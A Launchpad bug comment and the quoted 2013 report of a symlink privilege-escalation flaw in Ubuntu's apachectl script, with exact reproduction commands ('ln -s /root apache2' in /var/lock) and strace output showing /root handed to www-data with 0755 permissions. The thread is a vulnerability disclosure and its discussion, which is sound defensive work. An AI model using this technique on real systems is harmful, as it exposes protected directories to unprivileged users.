Comment 5 for bug 1104049

You are right. I had disabled Yama. In any case it would be a problem for
10.04?

Thanks,
Hayawardh
On Jan 25, 2013 3:55 PM, "Marc Deslauriers" <email address hidden>
wrote:

> On Ubuntu 10.10 and later this isn't an issue because of Yama sumlink
> restrictions.
> What version of Ubuntu did you try this on?
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1104049
>
> Title:
> /usr/sbin/apachectl privilege escalation
>
> Status in “apache2” package in Ubuntu:
> Confirmed
>
> Bug description:
> Dear all,
>
> The /usr/sbin/apachectl script allows unprivileged local users to
> change the permissions of any directory to 0755 and in addition make
> the user www-data its owner.
>
> The script has a line:
>
> start)
> ...
> install -d -o ${APACHE_RUN_USER:-www-data}
> ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> Since in Ubuntu the /var/lock directory has world-writable permissions,
> a user can create a symbolic link to any directory. An administrator then
> starts Apache through /etc/init.d/apache2, which in turn calls the script
> /usr/sbin/apachectl which will change the permissions of the directory
> pointed to by the symbolic link to 0755 and in addition, make the user
> www-data its owner.
>
> Details:
> =====
> root@u32d:~# apt-cache policy apache2.2-common
> apache2.2-common:
> Installed: 2.2.22-1ubuntu1
> Candidate: 2.2.22-1ubuntu1.2
> Version table:
> 2.2.22-1ubuntu1.2 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main
> i386 Packages
> 500 http://security.ubuntu.com/ubuntu/ precise-security/main
> i386 Packages
> *** 2.2.22-1ubuntu1 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386
> Packages
> 100 /var/lib/dpkg/status
>
> root@u32d:~# lsb_release -rd
> Description: Ubuntu 12.04 LTS
> Release: 12.04
>
> Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable
> to Quantal 12.10):
>
> As an untrusted user, create a symbolic link in /var/lock to a
> directory the user does not have read/search permission (e.g., /root):
>
> hayawardh@u32d:~$ ls -ld /root
> drwx------. 14 root root 4096 Jan 24 08:23 /root
>
> hayawardh@u32d:~$ cd /var/lock
> hayawardh@u32d:/var/lock$ ln -s /root apache2
>
> Wait for the administrator to start Apache
>
> root@u32d:~# /etc/init.d/apache2 start
> * Starting web server apache2
> apache2: Could not reliably determine the server's fully qualified
> domain name, using 127.0.1.1 for ServerName
> ...done.
>
> Now check permissions of /root:
> root@u32d:~# ls -ld /root
> drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root
>
> Fixing this does not seem straightforward because install opens the
> file to change permissions (in this case, /var/lock/apache2) without
> O_NOFOLLOW, and there does not seem to be a command line switch for
> the same.
>
> Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-
> data} ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> mkdir("/var", 0755) = -1 EEXIST (File exists)
> chdir("/var") = 0
> mkdir("lock", 0755) = -1 EEXIST (File exists)
> chdir("lock") = 0
> mkdir("apache2", 0700) = -1 EEXIST (File exists)
> open("apache2", O_RDONLY|O_NOCTTY|O_NONBLOCK|O_LARGEFILE|O_DIRECTORY) = 3
> fstat64(3, {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
> fchown32(3, 33, -1) = 0
> fchmod(3, 0755) = 0
> close(3) = 0
>
> Thanks,
> Hayawardh
>
> To manage notifications about this bug go to:
>
> https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/1104049/+subscriptions
>